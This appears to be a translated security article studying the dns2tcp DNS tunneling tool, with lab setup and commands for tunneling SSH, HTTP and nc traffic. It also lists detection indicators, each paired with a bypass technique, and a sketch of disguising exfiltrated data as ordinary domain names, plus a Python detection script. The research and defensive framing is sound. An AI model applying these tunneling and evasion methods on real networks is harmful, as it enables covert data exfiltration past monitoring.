Foreword
This article studies dns2tcp, a DNS tunneling tool.
GitHub: https://github.com/alex-sector/dns2tcp
I. Overview
1. Introduction
Last updated in 2017, written in C
TCP over DNS, i.e. forwarding TCP connections through a DNS tunnel without encryption. It uses a direct connection, but the speed is not particularly good. The advantage is that Kali ships this tool directly, and some Linux distributions can install it straight from the package manager, which is relatively convenient.
- DNS tunneling through legitimate DNS servers
- C/S (dns2tcpc/dns2tcpd) structure
- By default, data is transmitted base64-encoded in TXT records (A records have a limited length)
- After the tunnel is established the connection is kept alive: a packet is sent out roughly every 0.6 s, and the maximum interval can be set to 3 s
- Needs to be combined with other proxy tools
2. Principle
For the principle of DNS, see: One article to understand DNS and domain name resolution
This tool places the data, base64-encoded, in TXT records. The DNS packets travel via the NS record and A record provided by an authoritative DNS server to the DNS server on the attacker's side, which completes the traffic proxy.
3. Usage
Common commands:
-c enable compression (for large traffic)
-F run in the foreground
-f specify the configuration file
-r specify the resource to use
-z specify the DNS domain name
-k set the transmission password
-l listen on a local port
-d debug level (1 | 2 | 3)
(1) Server
Modify the /etc/dns2tcpd.conf configuration file and establish a tunnel: dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf
(2) Client
Test whether it can connect: dns2tcpc -z xxx.xx.xxx
Establish a tunnel and use the ssh resource: dns2tcpc -c -k password -d 1 -l 7002 -r ssh -z xxx.xx.xxx
Then point the corresponding service at the locally configured port.
II. Practice
1. Test scenario
(1) Attacker machine
Kali 2021, 192.168.10.128
(2) DNS server
Windows Server 2008: 192.168.10.200
Set a static IP; see https://blog.csdn.net/pockeyfan/article/details/42063683
Create a new A record pointing to the Kali server
Create a new delegation (i.e. an NS record) pointing to the domain name of the A record just created
Create another A record pointing to the Windows server itself
(3) Target machine
Ubuntu 18.04 192.168.10.129
Since the simulated DNS server acts as a real authoritative server, the target machine must be able to send its DNS resolution to that DNS server, so the target machine's DNS resolver setting has to be changed.
Check with nslookup
2. Establish a tunnel
(1) Server
Start the Apache service
Modify the configuration file
After modification
Start listening
(2) Client
Test for connectivity
Start up
Then the http service can be accessed
Similarly, ssh, nc, smtp and other services can be proxied through the tunnel in the same way.
Note: ssh will occasionally report a connection reset by peer, and it may take a few more tries.
3. Take a look at the package
In the handshake phase, the heartbeat packets all carry legitimate-looking domain names.
When the tunnel is in use, a large number of TXT record packets carry base64-encoded data inside the domain name.
III. Explore
1. Source code and analysis
2. Detection and bypass
(1) The number of abnormal DNS packets
As shown in the figure above, when the DNS tunnel is in use there are nearly 200 DNS packets within 1 s, and they all come from the same DNS server.
Bypass method: add an interval between packets, but this makes the transfer very slow.
(2) Special record type TXT
Usually only mail servers/gateways query TXT records, and never in such large numbers. In normal DNS traffic the proportion of TXT records may be only 1%-2%.
Bypass method: mix A, AAAA, TXT, MX, CNAME and other record types.
(3) Abnormal domain name
The domain names contain base64-like strings, which can be detected by methods such as information entropy.
Bypass method: maintain a dictionary of common domain names and split the data across them, but this greatly increases the number of packets.
For example, suppose the file name finalexamanswer.doc is to be sent out.
base64 it -> ZmluYWxleGFtYW5zd2VyLmRvYw
Then encode it with common domain names, so it becomes Zm -> zone.music.domain, lu -> login.user.domain, YW -> yun.web.domain ...
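As an added example (not code from the article or from dns2tcp), the following Python script applies the three indicators above to DNS query log lines: per-client peak queries per second for (1), the share of TXT queries for (2), and Shannon entropy of the first label for (3). The log format, the sample lines, the thresholds and the placeholder tunnel zone xxx.xx.xxx are all assumptions.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed sample log: "<seconds> <client> <qtype> <qname>" per line.
# Not captured traffic; it mimics a dns2tcp burst of TXT queries carrying
# base64-like labels under the placeholder tunnel zone xxx.xx.xxx.
SAMPLE_LOG = """\
1.00 192.168.10.129 A www.example.com
1.10 192.168.10.129 TXT ZmluYWxleGFtYW5zd2VyLmRvYw.t.xxx.xx.xxx
1.11 192.168.10.129 TXT aGVsbG8gd29ybGQgdGhpcyBpcyB0ZXN0.t.xxx.xx.xxx
1.12 192.168.10.129 TXT c29tZSBtb3JlIHR1bm5lbCBkYXRh.t.xxx.xx.xxx
1.13 192.168.10.129 TXT YW5kIGV2ZW4gbW9yZSBkYXRhIGhlcmU.t.xxx.xx.xxx
2.50 192.168.10.130 A mail.example.com
2.60 192.168.10.130 MX example.com
"""

def parse_log(text):
    # Each non-empty line of the assumed format becomes one record dict.
    return [dict(zip(("ts", "client", "qtype", "qname"), line.split()))
            for line in text.splitlines() if line.strip()]

def shannon_entropy(s):
    # Bits per character of the label's character distribution.
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def looks_encoded(label, entropy_threshold):
    # Indicator (3): long label, base64-style alphabet only, high entropy.
    return (len(label) >= 16 and re.fullmatch(r"[A-Za-z0-9+/=_-]+", label) is not None
            and shannon_entropy(label) >= entropy_threshold)

def analyze(records, rate_threshold=100, txt_ratio_threshold=0.05, entropy_threshold=3.5):
    # Per-client indicators: peak queries/second (1), TXT share (2), encoded labels (3).
    by_client = defaultdict(list)
    for r in records:
        by_client[r["client"]].append(r)
    report = {}
    for client, recs in by_client.items():
        peak_qps = max(Counter(int(float(r["ts"])) for r in recs).values())
        txt_ratio = sum(r["qtype"] == "TXT" for r in recs) / len(recs)
        encoded = sum(looks_encoded(r["qname"].split(".")[0], entropy_threshold) for r in recs)
        flags = [name for name, hit in (("high_rate", peak_qps >= rate_threshold),
                                        ("txt_heavy", txt_ratio > txt_ratio_threshold),
                                        ("encoded_labels", encoded > 0)) if hit]
        report[client] = {"peak_qps": peak_qps, "txt_ratio": txt_ratio,
                          "encoded_labels": encoded, "flags": flags}
    return report

if __name__ == "__main__":
    print(analyze(parse_log(SAMPLE_LOG), rate_threshold=4))
```

The rate threshold is lowered to 4 for the short sample; against real traffic the article's figure of roughly 200 queries per second from one client is the kind of value to alert on.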
(4) Heartbeat package
Both the interval and the number of heartbeat packets are problems.
Bypass method: the interval can be made longer, or even random, and the count can be dealt with by using a UDP socket to re-establish the tunnel.
(5) Command features
Some commands contain characteristic strings.
Bypass method: change the strings.
Epilogue
The heartbeat packets do a good job of looking like normal domain name requests, but there is still some room for improvement.